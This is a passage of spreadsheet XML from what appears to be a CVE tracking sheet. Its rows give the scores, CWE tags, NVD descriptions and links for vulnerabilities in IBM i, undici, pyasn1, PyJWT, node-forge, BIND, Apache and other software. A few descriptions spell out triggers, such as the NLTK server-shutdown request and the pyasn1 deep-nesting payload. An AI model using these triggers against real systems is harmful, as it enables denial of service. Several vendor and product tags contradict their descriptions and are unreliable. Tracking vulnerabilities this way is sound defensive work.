          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to a buffer overflow.</t>
        </is>
      </c>
      <c r="M1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17470</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18175</t>
        </is>
      </c>
      <c r="C1002" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1002" s="5" t="inlineStr"/>
      <c r="F1002" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1002" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1002" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1002" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to manipulate database transactions due to improper authorization in the DDM target dispatcher.</t>
        </is>
      </c>
      <c r="M1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18175</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19300</t>
        </is>
      </c>
      <c r="C1003" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1003" s="5" t="inlineStr"/>
      <c r="F1003" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1003" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1003" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1003" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to incomplete scrubbing of sensitive credential fields.</t>
        </is>
      </c>
      <c r="M1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19300</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19305</t>
        </is>
      </c>
      <c r="C1004" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1004" s="5" t="inlineStr"/>
      <c r="F1004" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1004" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1004" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1004" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to server-side request forgery.</t>
        </is>
      </c>
      <c r="M1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19305</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19534</t>
        </is>
      </c>
      <c r="C1005" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1005" s="5" t="inlineStr"/>
      <c r="F1005" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1005" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1005" s="5" t="inlineStr"/>
      <c r="I1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-252</t>
        </is>
      </c>
      <c r="L1005" s="5" t="inlineStr">
        <is>
          <t>undici's WebSocket client crashes the whole Node.js process during the opening handshake when a server responds with a subprotocol that the client never requested. A default WebSocket connection sends no subprotocol, but if the server's 101 response includes a Sec-WebSocket-Protocol header, undici dereferences a null value while checking it against the requested list and throws an uncaught TypeError. Because that code runs inside a microtask with no surrounding error handling, the exception propagates and terminates the process under Node's default behavior, instead of gracefully failing the connection as required by the WebSocket protocol. Any application that opens a WebSocket to an attacker-controlled or compromised server, or over a plaintext connection subject to a machine-in-the-middle, can be crashed remotely without authentication in the default configuration. This affects undici versions from 6.7.0 up to 6.28.1, from 7.0.0 up to 7.29.1, and from 8.0.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="M1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19534</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23490</t>
        </is>
      </c>
      <c r="C1006" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1006" s="5" t="inlineStr"/>
      <c r="F1006" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1006" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1006" s="5" t="inlineStr">
        <is>
          <t>debian:debian_linux, pyasn1:pyasn1</t>
        </is>
      </c>
      <c r="I1006" s="5" t="inlineStr">
        <is>
          <t>2026-01-16</t>
        </is>
      </c>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1006" s="5" t="inlineStr">
        <is>
          <t>pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2.</t>
        </is>
      </c>
      <c r="M1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23490</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24301</t>
        </is>
      </c>
      <c r="C1007" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1007" s="5" t="inlineStr"/>
      <c r="F1007" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="G1007" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1007" s="5" t="inlineStr">
        <is>
          <t>microsoft:copilot</t>
        </is>
      </c>
      <c r="I1007" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1007" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24301</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25639</t>
        </is>
      </c>
      <c r="C1008" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1008" s="5" t="inlineStr"/>
      <c r="F1008" s="5" t="n">
        <v>0.028</v>
      </c>
      <c r="G1008" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1008" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1008" s="5" t="inlineStr">
        <is>
          <t>2026-02-09</t>
        </is>
      </c>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-754</t>
        </is>
      </c>
      <c r="L1008" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.</t>
        </is>
      </c>
      <c r="M1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25639</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26456</t>
        </is>
      </c>
      <c r="C1009" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1009" s="5" t="inlineStr"/>
      <c r="F1009" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1009" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1009" s="5" t="inlineStr"/>
      <c r="I1009" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-476</t>
        </is>
      </c>
      <c r="L1009" s="5" t="inlineStr">
        <is>
          <t>A null pointer dereference vulnerability exists in the server-side session management logic of ccoap 77f55c4b466e99327c24ace8a2913d3ba7e2ccd5. The issue is caused by a race condition between the request dispatch thread and the session cleanup thread when accessing shared session list nodes without proper synchronization.</t>
        </is>
      </c>
      <c r="M1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26456</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29074</t>
        </is>
      </c>
      <c r="C1010" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1010" s="5" t="inlineStr"/>
      <c r="F1010" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1010" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1010" s="5" t="inlineStr">
        <is>
          <t>svgo:svgo</t>
        </is>
      </c>
      <c r="I1010" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L1010" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.</t>
        </is>
      </c>
      <c r="M1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29074</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3039</t>
        </is>
      </c>
      <c r="C1011" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1011" s="5" t="inlineStr"/>
      <c r="F1011" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1011" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1011" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I1011" s="5" t="inlineStr">
        <is>
          <t>2026-05-20</t>
        </is>
      </c>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-771</t>
        </is>
      </c>
      <c r="L1011" s="5" t="inlineStr">
        <is>
          <t>BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets.  Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments.
This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.</t>
        </is>
      </c>
      <c r="M1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3039</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30922</t>
        </is>
      </c>
      <c r="C1012" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1012" s="5" t="inlineStr"/>
      <c r="F1012" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1012" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1012" s="5" t="inlineStr">
        <is>
          <t>pyasn1:pyasn1</t>
        </is>
      </c>
      <c r="I1012" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J1012" s="5" t="inlineStr"/>
      <c r="K1012" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-835</t>
        </is>
      </c>
      <c r="L1012" s="5" t="inlineStr">
        <is>
          <t>pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with "Indefinite Length" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.</t>
        </is>
      </c>
      <c r="M1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30922</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32286</t>
        </is>
      </c>
      <c r="C1013" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1013" s="5" t="inlineStr"/>
      <c r="F1013" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1013" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1013" s="5" t="inlineStr">
        <is>
          <t>jackc:pgproto3</t>
        </is>
      </c>
      <c r="I1013" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-129</t>
        </is>
      </c>
      <c r="L1013" s="5" t="inlineStr">
        <is>
          <t>The DataRow.Decode function fails to properly validate field lengths. A malicious or compromised PostgreSQL server can send a DataRow message with a negative field length, causing a slice bounds out of range panic.</t>
        </is>
      </c>
      <c r="M1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32286</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32597</t>
        </is>
      </c>
      <c r="C1014" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1014" s="5" t="inlineStr"/>
      <c r="F1014" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1014" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1014" s="5" t="inlineStr">
        <is>
          <t>pyjwt_project:pyjwt</t>
        </is>
      </c>
      <c r="I1014" s="5" t="inlineStr">
        <is>
          <t>2026-03-13</t>
        </is>
      </c>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347, CWE-863</t>
        </is>
      </c>
      <c r="L1014" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a JSON Web Token implementation in Python. Prior to 2.12.0, PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC. This vulnerability is fixed in 2.12.0.</t>
        </is>
      </c>
      <c r="M1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32597</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33231</t>
        </is>
      </c>
      <c r="C1015" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1015" s="5" t="inlineStr"/>
      <c r="F1015" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1015" s="5" t="inlineStr">
        <is>
          <t>f5, python</t>
        </is>
      </c>
      <c r="H1015" s="5" t="inlineStr">
        <is>
          <t>nltk:nltk</t>
        </is>
      </c>
      <c r="I1015" s="5" t="inlineStr">
        <is>
          <t>2026-03-20</t>
        </is>
      </c>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1015" s="5" t="inlineStr">
        <is>
          <t>NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service. Commit bbaae83db86a0f49e00f5b0db44a7254c268de9b patches the issue.</t>
        </is>
      </c>
      <c r="M1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33231</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33894</t>
        </is>
      </c>
      <c r="C1016" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1016" s="5" t="inlineStr"/>
      <c r="F1016" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1016" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1016" s="5" t="inlineStr">
        <is>
          <t>digitalbazaar:forge</t>
        </is>
      </c>
      <c r="I1016" s="5" t="inlineStr">
        <is>
          <t>2026-03-27</t>
        </is>
      </c>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-347</t>
        </is>
      </c>
      <c r="L1016" s="5" t="inlineStr">
        <is>
          <t>Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.  Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.</t>
        </is>
      </c>
      <c r="M1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33894</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34355</t>
        </is>
      </c>
      <c r="C1017" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1017" s="5" t="inlineStr"/>
      <c r="F1017" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1017" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1017" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I1017" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr">
        <is>
          <t>CWE-120, CWE-122</t>
        </is>
      </c>
      <c r="L1017" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in mod_proxy_html in Apache HTTP Server 2.4.67 and earlier allows an attack by an untrusted backend.
Users are recommended to upgrade to version 2.4.68, which fixes this issue.</t>
        </is>
      </c>
      <c r="M1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34355</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34986</t>
        </is>
      </c>
      <c r="C1018" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1018" s="5" t="inlineStr"/>
      <c r="F1018" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1018" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1018" s="5" t="inlineStr">
        <is>
          <t>go-jose_project:go-jose</t>
        </is>
      </c>
      <c r="I1018" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-248</t>
        </is>
      </c>
      <c r="L1018" s="5" t="inlineStr">
        <is>
          <t>Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. Prior to 4.1.4 and 3.0.5, decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key. This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected. This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common. Panics can lead to denial of service. This vulnerability is fixed in 4.1.4 and 3.0.5.</t>
        </is>
      </c>
      <c r="M1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34986</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35172</t>
        </is>
      </c>
      <c r="C1019" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1019" s="5" t="inlineStr"/>
      <c r="F1019" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1019" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1019" s="5" t="inlineStr">
        <is>
          <t>distribution:distribution</t>
        </is>
      </c>
      <c r="I1019" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-524</t>
        </is>
      </c>
      <c r="L1019" s="5" t="inlineStr">
        <is>
          <t>Distribution is a toolkit to pack, ship, store, and deliver container content. Prior to 3.1.0, distribution can restore read access in repo a after an explicit delete when storage.cache.blobdescriptor: redis and storage.delete.enabled: true are both enabled. The delete path clears the shared digest descriptor but leaves stale repo-scoped membership behind, so a later Stat or Get from repo b repopulates the shared descriptor and makes the deleted blob readable from repo a again. This vulnerability is fixed in 3.1.0.</t>
        </is>
      </c>
      <c r="M1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35172</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41602</t>
        </is>
      </c>
      <c r="C1020" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1020" s="5" t="inlineStr"/>
      <c r="F1020" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1020" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1020" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I1020" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J1020" s="5" t="inlineStr"/>
      <c r="K1020" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1020" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41602</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
